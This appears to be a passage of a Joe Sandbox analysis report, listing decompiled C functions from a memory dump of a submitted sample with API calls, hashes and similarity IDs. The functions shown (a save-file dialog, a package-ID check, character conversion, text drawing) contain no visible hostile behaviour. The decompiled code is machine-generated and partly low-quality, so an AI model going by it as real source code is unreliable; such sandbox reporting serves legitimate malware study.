				intOrPtr _v60;
				signed int _v64;
				intOrPtr _v88;
				struct tagOFNA _v92;
				signed int _t12;
				intOrPtr _t16;

				_t16 = __ecx;
				E010A66E0( &_v92, 0, 0x58);
				_v92 = 0x58;
				_v40 = 0x806;
				_v88 = _t16;
				_v64 = L"output.prn";
				_v60 = 0x104;
				_v32 = L"prn";
				_t12 = GetSaveFileNameW( &_v92);
				asm("sbb eax, eax");
				return  ~_t12 & L"output.prn";
			}











                                                  0x010a154f
                                                  0x010a1551
                                                  0x010a155d
                                                  0x010a1564
                                                  0x010a156b
                                                  0x010a156e
                                                  0x010a1575
                                                  0x010a157c
                                                  0x010a1583
                                                  0x010a158b
                                                  0x010a1596

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: FileNameSave_memset
                                                  • String ID: X$prn
                                                  • API String ID: 1534219092-48460805
                                                  • Opcode ID: 0236a61d3e32a07435c3da76f6247a19fc48f4f561c5032feb24b510c98aa842
                                                  • Instruction ID: e2599603cedc2607cc0b31915f7e08254877d9d8b234ea696e0a881e293b064c
                                                  • Opcode Fuzzy Hash: 0236a61d3e32a07435c3da76f6247a19fc48f4f561c5032feb24b510c98aa842
                                                  • Instruction Fuzzy Hash: AFF08CB1C4024D9BCB00DFD4DC4A7CEBBB8AB08749F104009E944EA284EBB984588F80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A8069 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 33%
                                                  			E010A8069(void* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t5;

				_v8 = _v8 & 0x00000000;
				_t5 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetCurrentPackageId");
				if(_t5 == 0) {
					L3:
					return 0;
				} else {
					_push(0);
					_push( &_v8);
					if( *_t5() != 0x7a) {
						goto L3;
					} else {
						return 1;
					}
				}
			}





                                                  0x010a806d
                                                  0x010a8082
                                                  0x010a808a
                                                  0x010a809e
                                                  0x010a80a1
                                                  0x010a808c
                                                  0x010a808c
                                                  0x010a8091
                                                  0x010a8097
                                                  0x00000000
                                                  0x010a8099
                                                  0x010a809d
                                                  0x010a809d
                                                  0x010a8097

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentPackageId), ref: 010A807B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 010A8082
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: GetCurrentPackageId$kernel32.dll
                                                  • API String ID: 1646373207-142416881
                                                  • Opcode ID: 74ef7e9d0bf7c52f03b9e37a69149a223e82a51dc4626ef6255aca5a11d048cc
                                                  • Instruction ID: cc3f773d983011958fed7e35ce9bd8c2ddb3a76e4604934d31fbaee96844d6fa
                                                  • Opcode Fuzzy Hash: 74ef7e9d0bf7c52f03b9e37a69149a223e82a51dc4626ef6255aca5a11d048cc
                                                  • Instruction Fuzzy Hash: 4FE0EC316A030477EB64ABF19E8AB9B769C970164AF504968F282E1081DAF9D6008764
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010AFAAD Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010AFAAD(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				signed int _t35;
				int _t38;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E010A9233( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E010AF98A( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							_t28 = _v20 + 4; // 0x840ffff8
							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E010A6117();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0x48b1fe1
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0x48b1fe1
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0x48b1fe1
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0x48b1fe1
						_t18 = _t59 + 4; // 0x840ffff8
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

















                                                  0x010afab5
                                                  0x010afaba
                                                  0x010afad4
                                                  0x00000000
                                                  0x010afad4
                                                  0x010afabc
                                                  0x010afac1
                                                  0x00000000
                                                  0x00000000
                                                  0x010afac6
                                                  0x010afae1
                                                  0x010afae6
                                                  0x010afae9
                                                  0x010afaf0
                                                  0x010afb0f
                                                  0x010afb16
                                                  0x010afb18
                                                  0x010afb5c
                                                  0x010afb64
                                                  0x010afb70
                                                  0x010afb73
                                                  0x010afb79
                                                  0x010afb7b
                                                  0x010afb8b
                                                  0x010afb8b
                                                  0x010afb8f
                                                  0x010afb91
                                                  0x010afb94
                                                  0x010afb94
                                                  0x010afb94
                                                  0x010afb94
                                                  0x00000000
                                                  0x010afb9a
                                                  0x010afb7d
                                                  0x010afb7d
                                                  0x010afb82
                                                  0x010afb82
                                                  0x010afb85
                                                  0x00000000
                                                  0x010afb85
                                                  0x010afb1a
                                                  0x010afb1d
                                                  0x010afb21
                                                  0x010afb4a
                                                  0x010afb4a
                                                  0x010afb4a
                                                  0x010afb4d
                                                  0x010afb4d
                                                  0x00000000
                                                  0x00000000
                                                  0x010afb4f
                                                  0x010afb53
                                                  0x00000000
                                                  0x00000000
                                                  0x010afb55
                                                  0x010afb55
                                                  0x010afb55
                                                  0x00000000
                                                  0x010afb55
                                                  0x010afb23
                                                  0x010afb23
                                                  0x010afb26
                                                  0x00000000
                                                  0x00000000
                                                  0x010afb2a
                                                  0x010afb34
                                                  0x010afb3a
                                                  0x010afb3d
                                                  0x010afb43
                                                  0x010afb46
                                                  0x010afb48
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010afb48
                                                  0x010afaf2
                                                  0x010afaf5
                                                  0x010afaf7
                                                  0x010afafc
                                                  0x010afafc
                                                  0x010afb01
                                                  0x00000000
                                                  0x010afb01
                                                  0x010afac8
                                                  0x010afacd
                                                  0x010afad1
                                                  0x010afad1
                                                  0x00000000

                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 010AFAE1
                                                  • __isleadbyte_l.LIBCMT ref: 010AFB0F
                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,048B1FE1,00BFBBEF,00000000,?,00000000,?,?,010B3743,?,00BFBBEF,00000003), ref: 010AFB3D
                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,?,?,010B3743,?,00BFBBEF,00000003), ref: 010AFB73
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                  • String ID:
                                                  • API String ID: 3058430110-0
                                                  • Opcode ID: 7ac7f67495ec194942098bc58d9c9eede84a3723049a816becf9cb66fe3169b6
                                                  • Instruction ID: b49655052fe9c2941dbecb5d08ad187e3ec53c803f59393c59de2416dba0f359
                                                  • Opcode Fuzzy Hash: 7ac7f67495ec194942098bc58d9c9eede84a3723049a816becf9cb66fe3169b6
                                                  • Instruction Fuzzy Hash: 2731C131600247EFEB218EB8C894BAE7FF9FF45360F558568E5A59B191D730E850CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A1810 Relevance: 6.0, APIs: 4, Instructions: 50stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 91%
                                                  			E010A1810(struct HDC__* __ecx, RECT* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				struct HDC__* _v8;
				struct tagSIZE _v16;
				int _t16;
				WCHAR* _t23;
				RECT* _t25;
				RECT* _t26;
				struct HDC__* _t27;
				int _t29;

				_t25 = __edx;
				_t23 = _a12;
				_t27 = __ecx;
				_t26 = __edx;
				_v8 = __ecx;
				GetTextExtentPoint32W(_t27, _t23, lstrlenW(_t23),  &_v16);
				if(_a4 != 0) {
					if(_a8 == 0) {
						_t29 = _t26->bottom - _v16.cy;
					} else {
						_t29 = _t26->top;
					}
					_t16 = lstrlenW(_t23);
					asm("cdq");
					ExtTextOutW(_v8, _t26->right - _v16.cx + _t26->left - _t25 >> 1, _t29, 4, _t26, _t23, _t16, 0);
				}
				return 1;
			}











                                                  0x010a1810
                                                  0x010a1817
                                                  0x010a1820
                                                  0x010a1823
                                                  0x010a1825
                                                  0x010a1831
                                                  0x010a183b
                                                  0x010a1841
                                                  0x010a184b
                                                  0x010a1843
                                                  0x010a1843
                                                  0x010a1843
                                                  0x010a1851
                                                  0x010a1862
                                                  0x010a186e
                                                  0x010a186e
                                                  0x010a187f

                                                  APIs
                                                  • lstrlenW.KERNEL32(?,?), ref: 010A1828
                                                  • GetTextExtentPoint32W.GDI32(?,?,00000000), ref: 010A1831
                                                  • lstrlenW.KERNEL32(?,00000000,?,?,00000000), ref: 010A1851
                                                  • ExtTextOutW.GDI32(?,00000000,00000000,00000004,?,?,00000000), ref: 010A186E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Textlstrlen$ExtentPoint32
                                                  • String ID:
                                                  • API String ID: 2058588642-0
                                                  • Opcode ID: 09a6487e9bdddacc0f03d78b5392d09b9b48bde00e051175bd5cae20706e7a80
                                                  • Instruction ID: 360c2803d978ae15fa74da46ae6a3cabf60c1f617d5ce8d8e611597d8887fc36
                                                  • Opcode Fuzzy Hash: 09a6487e9bdddacc0f03d78b5392d09b9b48bde00e051175bd5cae20706e7a80
                                                  • Instruction Fuzzy Hash: 3B015E72900114BFE7109E9CDD88FEEBBBCEB49310F448155FA58E3144C735A950CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%